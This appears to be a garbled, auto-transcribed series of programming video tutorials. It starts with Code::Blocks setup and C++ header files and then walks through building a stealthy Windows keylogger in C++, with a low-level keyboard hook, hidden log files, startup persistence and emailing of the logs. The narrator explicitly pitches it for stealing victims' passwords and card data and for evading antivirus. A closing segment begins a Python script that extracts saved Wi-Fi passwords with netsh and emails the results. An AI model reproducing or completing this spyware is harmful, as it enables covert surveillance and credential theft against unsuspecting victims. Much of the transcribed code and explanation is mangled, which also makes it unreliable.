Hello everyone. Today I will show you how you guys can download code blocks and install it on your PC. So first go to Google and search code block. Here is main result and it is code block official website. Just click it. The open source cross-platform free C, C++ and Trojan. So here is downloads options. There are different ways to download and install code blocks on your computer, like download the binary release which is latest, download the source code, retrieve source code from is VN. So I click download the binary options. Here is all the version release in code block for Windows XP, Vista 7, 8 or 10. So code blocks 17, last update 17, and the code blocks 17.12 setup.exe file includes code blocks with all plugins. The code blocks 17.12 setup non-admin exe.exe file is provided for convenience to users that do not have administrator rights on their machines. So go to SourceForge. Here is downloading code blocks 17.12.exe. Go to my download. And here is code blocks 17.12. Just double click to install. Click simply next. I agree. You can choose any folder where you can install it. So I leave it in C drive. Click next. Now it installing. Needs some time for installing. Almost done installation, and the app icon is already in my desktop. Code blocks. So complete successfully, and now open code blocks 17.12, the open source cross platform IDE, because code blocks is the open source. Now simply click finish. Compilers auto detection. After auto detection, at least one compiler's master path is still empty and therefore invalid. Inspect the list below and change the compiler's master path. Later in the compiler options, select your favorite default compiler here. So it have to be changed. Click OK. Yes, click yes. So this is the dashboard of code blocks, where we can make many projects using C, C++. So in file, click new and project. Here is what application you want to make. Console application, click go. Then C or C++, I click C++. Next, and give a project title here, and folder, let's give hello, and I want to save it on document. My project title is hello and it's saved in document. So now start this project. In workplace, here you see hello and sources main.cpp. Just click here main.cpp. So this is the first code, hello world. Build or run, click run for this, and you can run by this icon. Run the program, and this is successfully executed hello world, and the first program is running. Hey there. To minimize the potential for errors, C++ has adopted the convention of using header files to contain declarations. You make the declarations in a header file, then use the #include directive in every CPP file or other header file that requires that declaration. C language has numerous libraries that include predefined functions to make programming easier. In C or C++ language, header files contain the set of predefined standard library functions. You request to use a header file in your program by including it with the C preprocessing directive include #include. All the header file have a .h and extension. By including a header file, we can use its contents in our program. C++ also offers its users a variety of functions, one of which is included in header files. In C++, all the header files may or may not end with the .h extension, but in C, all the header files must necessarily end with the .h extension. A header file contains function definitions, data type definitions, and macros. It offers the above features by importing them into the program with the help of a preprocessor directive #include. And these preprocessor directives are used for instructing compiler that these files need to be proceed before compilation. So let's check. Let's create. In C++ program has the header file which stands for input and output stream used to take input with the help of cin, cin and cout respectively. And there are two types of header file. So click console application, next C++, click next, give a project title and folder to create project in, then project file name. So I give project title car, CAR. Let's give car showing and next, and click finish. Here is my project car showing and sources. Click main.cpp. By default, hello world program is written there. Here you can click new, file, and see C++ header file. Click next, give a file name, Let's give car, and here give file name with full path. The file name is car.h. Just uncheck it, add file to active project, uncheck it or check it. Just check it and click finish. Here is my header file car.h, which I recently created. In header file, by default, if and def car is included, and hash define car underscore is underscore included. There are two types of header files. Number one, pre-existing header files which are already available in C, C++ plus compiler. We just need to import them. And number two, user defined header files. These files are defined by the user and can be imported using hash include syntax, hash include, and file name. Here my is car.h or include filename.h. So here is my class car and type private, data type. We can include header files in our program by using one of the above two syntax, whether it is predefined or user defined header file. The hash include preprocessor is responsible for directing the compiler that the header file needs to be processed before compilation and includes all the necessary data type and function definitions. And we can't include the same header file twice in any program. Or you can do including multiple header files. You can use various header files in a program. When a header file is included twice within a program, the compiler processes the contents of that header file twice. This leads to an error in the program. To eliminate this error, conditional preprocessor directives are used. This is simply code. Char means character, and type is public. This construct is called wrapper hash if and def. When the header is included again, the conditional will become false because header file name is defined. The processor will skip over the entire contents of the file and the compiler will not see it twice. Sometimes it's essential to include several diverse header files based on the requirements of the program. For this, multiple conditionals are used. Syntax: hash if system1 include system1.h like this, and elif system2 include system2.h, and elif system3 like this. Char name car20, char color underscore car20, and integer model price, integer price, void display. Now I take another header file, click next, next. And it got.cpp. Standard header files and their use, like hash include studio.h, it is used to perform input and output operations using functions scanf and printf. Hash include iostream, it is used as a stream of input and output using cin and cout. Include string.h, it is used to perform various functionalities related to string manipulation like stream, strcmp, strcpy. Include math.h, it is used to perform mathematical operations like sqrt, log2, pow. Include io main p.h, it is used to access set and set precision function to limit the decimal places in variables. And include signal.h, it is used to perform signal handling functions like signal and raise. Another one is include string.h, it is used to perform standard argument functions like va_start and va_arg. It is also used to indicate start of the variable length argument list and to fetch the arguments from the variable length argument list in the program respectively. Now I write the code again. str copy name underscore car name str copy color underscore car color give semicolon and model equal mod mo price equal pri my code is almost complete and give void car display cout finally name underscore car color underscore car model underscore I'm sorry, not underscore model, just model price and /n. This is main.cpp. Let's modify it. Hash include car.h header file which I written. Just remove this car ob underscore let's write Kia black 2009. This is model number, manufacturer year, car name, color, model and price. I set it in main function. What's wrong? Let's find out. Oh, okay. ob.display error in number 8, number 12, undefined references to car display and error id returned. Let's check this header files and open. Okay, click OK. Here is another error. space and add hash include iostream, give std one more error. Now it's okay, sucks, and ready to run the code, and it successfully execute, I hope. Now it is successfully executed. Name Kia, color black, model price. Okay, that's it guys. So what is keylogger? And how to code keylogger in C++? I showed you step by step. As the word itself suggests, function by logging or capturing keys or keystrokes. Technically, a keylogger is a software tool or program which is used to capture keystrokes that a user presses in real time. Further processing depends on the nature of the keylogger, whether it is a physical or remote keylogger. The technique of capturing key strokes is called keylogging. It's hard to believe, but keylogging is the easiest method to hack someone's password. All you need is a good keylogger, a good crypter, and the knowledge to spare your keylogger program. So I make a helper.h headers. Hash if and dep helper underscore h. Now hash it's hard to believe that keylogging is the easiest method to hack someone's password. All you need is good keylogger. Thousands of keyloggers are available online for free, but all of these are either detectable by antivirus or ironically have a virus attached to hack the user. Clearly, we need to be cautious when using freely available keyloggers or cracked versions of paid keyloggers. Include C time, include string, but why should you become prey to other hackers when designing your own is damn easy? Most novice hackers or script kiddies think that coding a good keylogger is a difficult and tedious task, but believe me, after reading and watching this tutorial, it will become a routine task for you to code a keylogger. And here hash include stream Today I will teach you guys the inward and outward logic of keywords. I have divided keylogger coding onto a few parts to make it easier for hacking loops users to properly understand. Let's start by learning how to code keyloggers in C++ stepwise. Alright, using namespace std string data type. Namespace helper use second bracket inside write template class T then write one more thing. You are going to learn about making a running and undetectable keylogger in C++ programming language. Trust me guys, and you will be amazed to know that you don't need to have a complete knowledge of C++ to learn this thing, as I am here to explain you in detail what happens by execution of which code of line. Just write the code like me. But still there are some prerequisites to learn how to design a keylogger and get the knowledge of different types of keylogger and how they work. You don't need to know the programming language, but you still need to know how a keylogger really works in a background and an algorithm to design it. Hence, before continuing your task, I recommend you to watch the video carefully. You need to identify a function which identifies and triggers when a key is pressed. You need to code the keylogger to run in stealth hidden mode. The first task is carried out by a function like get as key state, which is part of Windows API in C++. Keylogger can't send you the log file via email. It's because at the start of this video I mentioned types of keylogger. How you get the log file from victim's computer depends on the type of keylogger, and hence it is not possible for me to code a keylogger each of one type. Still, one can add its code if you are a pro coder. And the last thing you need to know is you have to attach the executable file in startup, else everything the victim restarts his or his laptop, this keylogger file will be removed from the main memory and hence it will stop functioning. Set string value. Right, extract date time. A keylogger is a useful tool, you know that's why you are here. If the keylogger has the functionalities like running in the background by going in stealth mode, avoid antivirus detection, and can send an email, then it is the most dangerous tool for the victim's PC. You can get confidential data like credit card information, username, library's email address, and passwords. After sharing a tutorial on how to create a keylogger, I decided to build this. And after successful compilation, the C++ keylogger can perform the following functions, like it will run in stealth mode, it can bypass the antivirus, it will store every keystroke in a text file, struct tm info equal local time and ms, then close this line. The local time function in C++ converts the given time since epoch to calendar time, which is expressed as local time. The local time function is defined in ctime in header file. D equal info tm mj, m equal info tm month plus 1. And y equal 1900 plus info greater than info dash greater than tm underscore er, then close this line by giving semicolon. So guys, this is how you guys can make header files and keyloggers, and the code is like this. Just watch carefully. A is equal info minus greater than tm hour. This is the basic structure. A is equal info tm underscore sec So finished successfully, and create a keylogger. Welcome back, guys. So headers C++ IO is provided in headers IOStream, which included iOS, IStream, OStream, and stream buff. FStream for file IO and SStream for string IO. Furthermore, the header IO main IP provided manipulators such as the setW, setPrecision, setFill, and setBadge for formatting. The C language did not build the input-output facilities into the language. In other words, there is no keyword like read or write. Instead of left I/O to the compiler as external library functions such as printf and scanf is studio library. The ANCIC standard formalized these I/O functions into standard I/O package. C++ continues this approach and formalizes I/O in libraries such as IOStream and FStream. Features like C++ I/O is type-safe. I/O operations are defined for each of the type. If I/O operations are not defined for a particular type, compiler will generate an error. C++ I/O operations are based on streams of bytes and are device independent. The same set of operations can be applied to different types of I/O devices. And C or C++ I/O are based on streams, which are sequence of bytes flowing in and out of the programs, just like water and oil flowing through a pipe. In input operations, data bytes flow from an input source such as keyboard, file, network, or another program into the program. In output operations, data bytes flow from the program to an output sink. Streams acts as an intermediaries between the programs and the actual I/O devices in such the way that frees the programmers from handling the actual devices so as to archive device independent I/O operations. C++ provides both the formatted and unformatted I/O functions, and in formatted or high level I/O, bytes are grouped and converted to types such as int, double, string, or user-defined types. In unformatted or low-level I/O, bytes are treated as raw bytes, and unconverted formatted I/O operations are supported, overloading the stream insertion and stream extraction operations which presents a consistent public I/O interface. Let's back to the code. Include CSTDB CSTD library, include iStream, include windows.h, include helper.h header file, include base 64, include f stream, now namespace IO, to perform input and output IO. A C++ program first construct a stream object, connect associated the stream object to an actual IO device, perform input-output operations on the stream, the functions defined in the stream's public interface in a device-independent manner. Some functions convert the data between the external format and internal format, while other does not, and disconnect the stream to the actual IO device. And lastly, free the stream object. std string getter path const bool, its expression, boolean expression, append separator, either true or false. This condition. Now select the path C users username app data roaming, C++ IO is provided in headers iStream, which include iOS, iStream, OStream, and stream buff, fstream for file IO, and sstream for string IO. C++ comes with libraries that provide us with many ways of performing input and output. In C++, input and output I/O are performed in the form of sequence. I/O stream stands for standard input-output stream. This header file contains definitions of objects like scene, cout, and I/O main IP stands for input-output manipulators. The method declared in these files are used for manipulating streams. This file contains definitions of set W, set precision, and stream. This header file mainly describes the file stream. This header file is used to handle the data being read more a file as input or data being written into the file output. And return full plus append separator. Type bool make one director, make one dir std string and path, then return boolean type, create directory path.c string and get null value, get last error equal error already exists. Welcome back. Last video I showed in IO the IOStream class is a type def to basic underscore OStream char. It contains two sets of output functions, formatted output and unformatted output. The formatted output functions overloaded stream insertion operator convert numeric values from their internal representations to a stream of characters that representing the numeric values in text from the unformatted output functions outputs the bytes as they are without format conversion. The OSStream class overloads the stream insertion operator for each of the C++ fundamental types. The Steam superclass iOS base maintains a data member to describe the states of stream, which is a bit mask of the type iOS state. The flags are .eof bit set when an input operation reaches end of life, and fail bit the last input operation failed to read the expected characters, or output operations fail to write the expected characters. Okay, now boolean type and make directory std string path. For this is now I'm gonna open a loop like for char and c path for use for loop, and if statement, if this is a condition, if c equal okay, let's write c first. Users paste download its path or stores. If c equal quotation inside double slash c equal slash if make one directory path and the value return false. Just if make one directory, then inside path and return value is false. C equal slash quotation inside double slash then semicolon to return true, use template, class t std string write log. A template is a simple and yet very powerful tool in C++. The simple idea is to pass data type as a parameter so that we don't need to write the same code for different data types. For example, a software company may need sort for different data types. Rather than writing and maintaining the multiple codes, we can write one sort and pass data type as a parameter. C++ adds two new keywords to support templates: template and type name. The second keyword can always be replaced by keyword class, and templates work are expanded at compiler time. This is like macros. The difference is the compiler does type checking before template expansion. The idea is simple: source code contains only function class, but compiled code may contain multiple copies of same function's class. Function templates will write a generic function that can be used for different data types. And I discussed already about date time. There are 4 time related types: clock underscore t, time underscore t, size underscore t, and tm. The types clock, size, and time are capable of representing the system time and date as some sort of integer. The structure type tm holds the data and time in the form of a C structure. And this is a now write the code in exception handling. What is try catch block? It's called exceptions. When executing C++ code, different errors can occur. Coding errors made by the programmer, errors due to wrong input, or other unforeseeable things. When an error occurs, C++ will normally stop and generate an error message. The technical term for this: C++ will throw an exception, and it is try and catch. Exception handling in C++ consists of 3 keywords like try, throw, and catch. The try statement allows you to define a block of code to be tested for errors while it is being executed. The throw keyword throws an execution when a problem is detected, and catch statement allows you to define a block of code to be executed if an error occurs in the try block. The try and catch keyword is for exception handling. Almost complete. Steady string data equal base 64 encrypt B64 again use if condition file return one more thing. Encryption of a data means converting the data from original form into a coded form. The coded form of original data cannot be read by an unauthorized person. Decryption of a data means converting data from copied form to its original form. Encrypted data can only be accessed by an authorized person. Now return name. Again catch exception, try catch block, return. So this is it. Our code is complete. Now go to main.cpp key constructs helper.h based 64.h header files. There are 4 header files, but one error in main.cpp. Hello everyone, welcome back. In this tutorial, the various functions of the const keyword which is found in C++ are discussed. Whenever constant keyword is attached with any method, variable, pointer variable and with the object of a class, it prevents that specific object, method, variable to modify its data items value. And constant variables, there are certain set of rules for the declaration and initialization of a constant variables. Like the constant variable cannot be left uninitialized at the time of the assignment. The constant variable cannot be uninitialized at the time of the assignment. It cannot be assigned value anywhere in the program, and explicit value needed to be provided to the constant variable at the time of declaration of the constant variable. Let's give the file name key constants.h. A program I am working on has many constants that apply throughout all classes. I want to make one header file constants.h and be able to declare all the relevant constants, and this is my other classes. Take include constants.h. This works because in C++ a namespace scope that is explicitly declared const and not explicitly declared externs has internal linkage, so these variables would not cause duplicate symbols when you link together translation units. And alternatively, you could explicitly declare the constants as static. Back to the code. Include hash if and def key constants underscore is. The declaration tells the compiler whether the element is an int or a double, a function, a class, or some other thing. Furthermore, each name must be declared directly or indirectly in every .cpp file in which it is used. When you compile a program, each .cpp file is compiled independently into a compilation unit. The compiler has no knowledge of what names are declared in other compilation units. That means that if you define a class or function or global variable, you must provide a declaration of that thing in each additional .cpp file that uses it. Each declaration of that thing must be exactly identical in all files. A slight inconsistency will cause errors or unintended behavior. when the linker attempts to merge all the compilation units into a single program. And in C or C++ program, we can define constants in two ways, like number one, using hash define preprocessor directive, and number two, using a constant keyword. The values assigned to each constant variables are referred to as the literals. Generally, both terms constants and literals are used interchangeably. For constant, int equal value is a constant expression and the value is referred to as constant integer literal. My class is key pair and data type is public. Key pair first bracket inside constant std string. String name, we can use to declare a constant like identifier name. It is the name given to constant, and value, this refers to any value assigned to identifier name. And using constant keyword to define constants is as simple as defining variables. The difference is you will have to precede the definition with a constant keyword. if std string vehicle name and std string name, I declare it in class keypair. Now take another class keys. This is public class. Static std map greater than integer and keypair map less than integer and keypair greater than keys. Welcome back. In constant, if you have defined a variable in a header file and not declared it as constant, then the compiler will treat it as a separate variable in each translation unit. So if you link two such translation units together under the same object layer, you will get multiple definition error or something like already defined in. To solve this issue, mark this variable static const or as simply constant. In C++, where static is implied for constant variables, what this does is to make the linkage of this variable definition internal, meaning that once this definition gets hash include d into a .c or .cpp file, the definition stays there. It does not have scope outside of the translation unit and thus connect to be seen by the other object files. On the other hand, the addresses of each of these copies of the constant in different translation units will be different. To have a true global constant this way, you will need to have an external constant double in your header file, followed by constant double in a separate source file, which is compiled into a separate object, which then gets linked with all other objects. To use constant instead of hash define, you must be able to place constant definitions inside header files as you can with hash define. This way you place the definition for a constant in a single place and distribute its translation units by including the header file. A constant in C++ defaults to internal linkage. It is visible only within the file where it is defined and cannot be seen a link time. I gather here many keys. Simply coding here, just type std and the value is this. I imported. To minimize the potential for errors, C++ has adopted the convention of using header files to contain declarations. You make the declarations in a header file, then use the include directive in every.cpp file or other header file that requires that declaration. Welcome back, guys. Welcome to C++ tutorial. In last video I work in constants and it's a file under its package in keylogger. So today I'll talk about key hook. Just check this. Okay, create a file, give file name key, keyhook.h. Keyhook provides low-level rebinding of both keyboard keys and mouse keys, as well as creation of macros, and it is especially useful for both games and applications which do not support rewinding of keys, and the bindings are built and run as a normal C++ program. So start coding hash even def key b hook file name, define key b hook underscore race, and hash define include iostream include windows.ace. Look the syntax carefully, guys, because C++ is a case sensitive programming language. Include key constants.h, include timer.h. This is all in this keylogger packages, so need to import them, all of this file. Include sendmail.h. Actually all of these are libraries. std string keylog. Hooks are one of the most powerful features of Windows also, and we can hooks to TRP all the events in the Windows environment also. This operating system, a hook is a mechanism by which a function can interrupt events, messages, mouse actions, keystrokes before they reach an application. Basically, function or something executed in between two functions or before one, and I've heard it's used before something such as machine functions or something to intercept messages sent between the user and machines. It is key hook. Back to the code, if keylog empty, it's a logic statement, and this is called if else statement. If keylog empty, then the value return last file in IO write log keylog who is in this keylogger project, and if again last file empty, then execute helper write app log. And the message is file creation was not successful dot keylog. Plus keylog to indicate keylog, and return value One more thing, key hook is case sensitive. Keyboard hooks are definitely a Windows thing and not a C++ thing. You will get more help, a more appropriate forum of or news group. For one reason, these people are more likely to have examples and such that they can find more conveniently for this question. Specifically, I think we'll get a better answer in another forum or news group. So give command. So back to the code, int x new int equal mail The logic is mail, send mail, then log, last file, and message is hi, and the file has been attached to this mail. And for testing, enjoy. Let's check. And for testing and enjoy. Now again give statement if 7 value helper write application app log mail was not sent error code plus helper it execute to string and application logger is a class that implements a logger that can be used by applications to save log file somewhere on the file system. And app log contains stream buff or stream static map string slow slog label and applog private. Now give timer mail timer send mail to 000 60 and timer infinite. Is hook hook equal value null. Welcome back in keylogger project. Last tutorial I showed you how you guys can use key hook. The Windows API offers a tool known as hooks, which are defined in their documentation as a point in the system message handling mechanism where an application can install a subroutine to monitor the message traffic in the system and process certain types of messages before they reach the target window procedure. And in other words, hooks are a way to intercept system messages and react accordingly. So from the last part, the constants of the main function are quite simple. We only need to initialize a handle to a hook, using the set windows hook function, and the first argument indicates the kind of message we will be monitoring, and in this case y keyboard underscore ll means that we will be receiving low level. That's what it stands for, information from the keyboard activity. You will see all available types of hooks on the MSDN document. And the second argument, it is hook procedure, which is a user defined function defining what the hook will do. Typically a hook is associated to a particular process and DLL containing its procedure, and those are indicated by the third and fourth arguments. For simplicity, we set both to null, meaning that the hook procedure is started by the same application and it will be associated with all threads running on the same desktop. And in the end, we call the unhook Windows hook X to get everything cleaned up. The most important part in an application like this is the definition of the hook procedure. As it's common on Windows API, this function can have any name as long it address to the appropriate function prototype. For instance, a procedure called keyboard proc should hook like this: L result callback keyboard proc int encode w pram w wprm wprm lprm iprm. The variable encode will contain a number smaller than 0 if there is no keyboard information currently available for HC action. Otherwise, if there is information, wparam will contain the type of message that was received, and lpram ipram will provide additional data. In this case, we are interested in the key down message wparam wm key down, which triggers whenever users presses a key. And when the wm underscore key down message is received, iparam contains a pkbdll hook struct which stores, among other things, the virtual key code of the pressed key. And once we extract this data, we can do whatever we want with it, like the function dot, and we analyze the user's keyboard activity and display a console message when the sequence lab case insensitive is type. This is achieved using a standard FSM based lexical analyzer. For completeness, the documenting function will look something like this. I create Alright, keylog plus equal keys, and keys inside kbs minus greater than vk code dot name, and if statement equals if kbs minus vk code equal vk, return keylog plus equal slash n here is our key constants. And now else if w param equal wm underscore key up, w param equal wm sys key up One more thing, there are two types of hooks, thread specific hooks and system wide hooks. And a thread specific hook is associated with particular thread only, any thread owned by the calling process. And if you want to associate the hook with other process and threads, you will have to use a system wide hook, and there is a hook procedure associated with a hook. This procedure is always called when the particular event occurs. For thread hooks, the hook procedure may be in an exe file or a DLL, but for global or system hooks, the hook procedure must reside in DLL. For this, we need to create a DLL. So d word key equal kbs minus greater than vk code, and again if key equal vk underscore control, and key equal v k underscore l control and r control, that means left control or right control, or key equal vk shift key equal vk r shift right shift vk left shift. Key equal menu, then key equal left menu vk left menu, it is also vk. key equal vk underscore capital. Just watch the code carefully and it's case sensitive. Again key equal vk underscore r menu, that means right menu. All of these are key value. Key equal vk number lock, key equal vk underscore lwin, again key equal vk underscore right win. Now the function is complete, and write string key name equal keys inside kbs std equal and kbs must be greater than vk code dot name. Key name dot insert one and keylog plus equal key name now write shift a d shit, I did a mistake. return call next hook e hook encode w param I param Welcome back. You can install several hooks at the same time as long as you follow the proper procedure. Windows hooks are designed to operate in a daisy chain fashion similar to subclassing. To install a hook, you call set windows hook with the type of hook and a pointer to your hook procedure. Set windows hook ex returns the handle to the old hook, and Windows calls your hook procedure whenever one of the hook events happens. When your procedure is done handling in the event, it's supposed to call the next hook by calling what else? Call next hook ex. Of course, there's no one forcing you to call next hook ex, but if you don't, your application is likely to break. In the case of computer-based training, CVT, hook MFC uses it to trap window creation. Windows calls the CVT hook with HCVT. Whenever it creates a window, MFC handles HCVT by subclassing the window and attaching it to its CWND object. And when Windows calls the CVT hook, it passes the HWND and W param. But how does MFC know which CWND derived object to attach? By setting a global. To create a window, you must call CWND create or CWND create EX. C++ class library to the manage extensions so I can expose it. And to install hook, write install hook and its boolean type expression either true or false. So mail timer dot start true, and if true, return e hook equal null. Give again expression bool uninstall hook when the need is closed. Simply give this expression bool uninstall hook bool b equal unhook windows hook ex ehook. And C++ itself does not have events or hooks, but a lot of C++ libraries and frameworks implement them. For an example of generic events library, cboost, signals, some of the implementations allow their events to be seen by the other applications. To hook functions, you use games to you gotta need the function you want to hook RVA. So return bool ehook equal null. So complete. Let's check it again. Here is main.cpp base 64 headers, and header files there are 1 2 3 4 5 6 7 headers file include key constants, base 64 helper, timer, send mail, headers file class, and in source file there is one main file. So in file click new and project. Here is what application you want to make. Console application, click go, then C or C++, I click C++, is keylogger. And how to code keylogger in C++, I showed you step by step. As the word itself suggests, function by logging or capturing keys or keystrokes. Technically, a keylogger is a software tool or program which is used to capture keystrokes that a user presses in real time. Further processing depends on the nature of the keylogger, whether it is a physical or remote keylogger. The technique of capturing strokes is called keylogging. It's hard to believe, but keylogging is the easiest method to hack someone's password. All you need is a good keylogger, a good crypter, and the knowledge to spare your keylogger program. So I make a helper.h headers, hash if But why should you become prey to other hackers when designing your own is damn easy? Most novice hackers or script kiddies think that coding a good keylogger is a difficult and tedious task, but believe me, after reading and watching this tutorial, it will become a routine task for you to code a keylogger. And here hash include is a stream Today I will teach you guys the inward and outward logic of keywords. I have divided keylogger coding onto a few parts to make it easier for hacking loops users to properly understand. Let's start by learning how to code keyloggers in C++ stepwise. Alright, using namespace std string data type and write. One more thing, you are going to learn about making a running and undetectable keylogger in C++ programming language. Trust me guys, and you will be amazed to know that you don't need to have a complete knowledge of C++ to learn this thing, as I am here to explain you in detail what happens by execution of which code of line. Just write the code like me. But still there are some prerequisites to learn how to design a keylogger and get the knowledge of different types of keylogger and how they work. You don't need to know the programming language, but you still need to know how a keylogger really works in a background and an algorithm to design it. Hence, before continuing your task, I recommend you to watch the video carefully. You need to identify a function which identifies and triggers when a key is pressed. You need to code the keylogger to run in stealth hidden mode. The first task is carried out by a function like get as key state, which is part of Windows API in C++. Keylogger can't send you the log file via email. It's because at the start of this video I mentioned types of keylogger. How you get the log file from victim's computer depends on the type of keylogger, and hence it is not possible for me to code a keylogger each of one type. Still, one can add its code if you are a pro coder. And the last thing you need to know is you have to attach the executable file in startup, else everything the victim restarts his or his laptop, this keylogger file will be removed from the main memory and hence it will stop functioning. A keylogger is a useful tool. You know that's why you are here. If the keylogger has the functionalities like running in the background by going in stealth mode, avoid antivirus detection, and can send an email, then it is the most dangerous tool for the victim's PC. You can get confidential data like credit card information, username, libraries, email address, and passwords. After sharing a tutorial on how to create a keylogger, I decided to build this. And after successful compilation, the C++ keylogger can perform the following functions, like it will run in stealth mode, it can bypass the antivirus, it will store every keystroke in a text file. I showed in IO. The IOStream class is a type def to basic underscore OStream char. It contains two sets of output functions, formatted output and unformatted output. The formatted output functions overloaded stream insertion operator convert numeric values from their internal representations to a stream of characters that representing the numeric values in text. From the unformatted output functions outputs the bytes as they are without format conversion. The OSTream class overloads the stream insertion operator for each of the C++ fundamental types. The Steam superclass iOS base maintains a data member to describe the states of stream, which is a bit mask of the type iOS state. The flags are .eof bit set when an input operation reaches end of life, and fail bit, the last input operation failed to read the expected characters, or output operations failed to write the expected characters. Okay, now boolean type and make directory std string path. For this is now I'm gonna open a loop like for char and c path for use for loop, and if statement, if this is a condition, if c equal okay, let's write c first. Users paste download its path or stores. If c equal quotation inside double slash c equal slash if make one directory path and the value return false. Just if make one director, then inside path and return value is false. C equal slash quotation inside double slash then semicolon to return true. Hello everyone, in this tutorial I will show you a basic keylogger projects a header file timer. So I make a project named timer and take a header file, empty file, C++ header, and the file name should be timer.h. So now I successfully created a header file timer. I take another file and file name is timer.h. I'm trying to make a basic keylogger in previous video and I want to be able to close the program after 20 minutes. Looking online I found this clock_t functions, but I can't figure out how to transform this into seconds. I tried to use the good old timer based on the sleep function, but it gave me a huge amount of problems considering that I must be able to type anything and save it in a log. I'm not able to understand high level of coding, therefore I struggled quite a bit looking at videos of descriptions on the internet. I was expecting to see displayed the seconds increasing over time, so I would later on be able to shut down the code once the desired amount of second would be reached, but I instead ran into a spam of the same number for the specific second. So first I have to take if and diff timer underscore h, then if define timer underscore h, include thread, include chrono, chrono, and class timer. If you do it, at least put a small sleep call to not disturb the other processes too much. You might want to look at the chrono library. Use them to calculate the current time and elapsed time. Then you would want to place that into a while loop and loop until the time elapsed becomes equal to the total time allotted. Then break from the loop to exit your application. You can then use the chrono library to convert between milliseconds, seconds, minutes, etc. It's not clear to me how to relate the epoch seconds to my seconds, and to answer in this question about the open.close, I did it that way. So the loop will do two things at the same time, which is checking each character and convert it into human language from ASCII, and to actually print it out in the log. Also I tried to give a look at the chrono library, but it seems to mostly work with similar units than second, which is kinda pointless for me. So bool alive false, bool call number 1L and long repeat C out 1L, then again std. Time waited for first about 1 minute, then printed 1, then waited for about 30 seconds, then printed 30. This is a nice lightweight class and is simple to use. I am currently in the process of adding more to this class to give support for manual starting and stopping uses with a default constructor. As this class currently stands above, you could create an instance or an object of this class as a variable and give it a time explicitly, and it will run for that long, but you cannot normally start and stop this timer when you want to. Once I finish this class, the default constructor will not use the internal members time to run for and run, as they are meant to be used with the explicit constructor version. Once completed, you can set how long you want something to run for the while loop, then terminate after desired time has expired by the explicit constructor version, or you can create a local instance of this class as an object, invoke the start function, do some other operations for an unknown amount of time, then call the stop function after the perform the query of the time elapsed. I need a little more time to finish this class, so I will post this as it for now. Once I complete my updates, the class I will update it here to newer. And one more thing is, timer is not a library, it is a header file that I wrote. It uses the Chorno library. You will need to create a new text file and name it timer.h. When you look at the hash include directives, there are two types. Include file name and include file name. Normally the ones that have the that have the less than greater than are looking in the system folder directory that is set up when you installed your compiler or IDE. The one that has the double quotation normally looks at the files within your current project or solution directory. So when you include any of the standard libraries such as string, vector, etc., you will see file name, but when you write your own headers, you will then use file name and under double quotation. That's a lot more clear, but even if I do so and create a text file in the IDE folder, I just have to paste the timer.h code that you sent in order to make it work. So last in this video, I will give the full code which is uploaded previously in GitHub. And threads are new to C++, and this will allow us to run asynchronous code execution without blocking the main thread in main.cpp. This is very useful. And bool alive, this code will check if the timer is running or not. And -1l counts how many times we would like to run a function, and L stands for long, so the number doesn't become an integer. And long repeat cout counts how many times a certain function. And function double parenthesis, first where calls the function to return a function, second where calls the function. So the loop is ending here. Sleep and run. And this is the full code, guys. Just watch the code carefully and try by your own in a keylogger. And this is the header file, timer.h, and this is the full code. Hope you guys liked it, and thanks for watching.
The code that we built so far is actually very useful because it can be used to execute any system command on any system. So if you are targeting a specific or unique based command like Linux or Mac OS X, then you will be able to run any unique based command. And these commands allow you to pretty much gain full control over the system. So if your target is Windows, then you can run any Windows command, plus you have all the PowerShell command that you can run on Windows 11, 10 or 8. And those basically like allow you to gain full control over the system. So now I want to take this one step further, and we are going to extend the script that we previously coded. So we are going to extend it. And first of all, we are going to execute a command, then send us the result of the command on our email. So in many cases, we are not interested into executing the command itself, but we are interested in the result that this command returns. So let me show you an example. First of all, I'm going to just go to my system command or Windows command prompt. Let's just maximize this. So as you can see, I just typed net sh ylan show profiles. So this will show all the profiles that your computer or your main machine is connected or previously connected. So as you can see, I am currently on my, as you can see, Wi-Fi on connected, which is on Akash. And also I connected previously, which is Tanvi Home. So these two are the connected profile that my machine is connected previously or connected right now. And this will, so let's just show all the information of this specific Wi-Fi profile. So just type net sh Wi-Fi line show profile, same as easily, and just type this name that you want to show the details. As you can see, if you just press enter, you will see I'll get all the information about this network if I want to. So as you can see, it will give you all the information about this Wi-Fi profile except for the password. As you can see, there is no password. information in here. So what now we are going to do is we are going to get our password in this profile without doing anything. So just what you have to do, CMS previously, net sh Wi-Fi LAN show profile X, and at the end just type key is equal to clear. So you will see and I will see that Wi-Fi password of this specific network is in here. As you can see, this is the Wi-Fi password. So I will even see the Wi-Fi password for this network, so which is right here. So this is an example of a command that we are interested in its result. So when this command is executed on the system, it doesn't really do anything useful to us unless we can see the result. And this is what the execute and report script are useful. So basically the script that I will build now and should be able to execute this command and send all of this result by email so that I can or you can read it. So as you can see, the Wi-Fi password is in here. So this is an example of a one command that returns the useful result, but you can extend this to any scenario so that you can even run like a standalone program, and that, for example, like still password and then email the password. So let's see how we can do that. So first of all, from the previous processes, as you can see, this is the code that we will do in here, but I already typed in here. But as you can see, this is pretty much similar to previous code, but we did some modification. So let's talk about how each one of these do. So first of all, it's important is the sub process, and I also import the SMTP lab. So this is the another library. This allow me to send emails from my Python code to the name of the library, which is smtplib. Then I'm going to write a function called send email, and this will allow me to send email from the Python code. Then from this function we are going to write email, then password, and then message. Email address, password, and message. So is the content of the message that we want to send. Now the first thing we need to do is create an instance of an SMTP server, and we're going to use the SMTP library to do that. So server SMTP library, and this is the instance SMTP. So as you can see, the server is equal to smtp lab.smtp. So this is going to create an SMTP server instance. So for me, which I created this object, I need to give this server that I want to use, and we're going to use a Google SMTP server because Google allow people to use their own server to send emails and addresses to their server through smtp.gmail.com. And the second argument here is the port. So Google run their server on port 587. So I'm using this port and I'm using this server because this is the Google server and this is the port that Google run their server on, and this is the code line in here. It will create an instance of an SMTP server. So it's going to store that in my server variable so that I can use that in order to send by email. So the next thing I'm going to do is initiate an TLS connection using the server that I just created. So I'm going to do is server dot start TLS. So we're going to need to log into our email so that you can send the email. So this is the similar when you go to like gmail.com and log in using email and password. So we're going to say that server dot login, and then email and the password of this section, and this will pass to the function. So we are going to log in with email and password, and finally we are going to set our email by saying server dot send email, and we're going to set our email and also email. The second and the third argument is the message, which is the content of the email. So we're going to set this email from our own email. So this is going to be email variable. So we're going to set this email as our email, and we don't want to send this to another person. So the content of this message is going to be the message that again, so we got it as an input to this function. Now once we are done with using the SMTP server, we are going to have to close it by server.quit. So now we have a generic function called send email. As you can see, this is the send email that we can 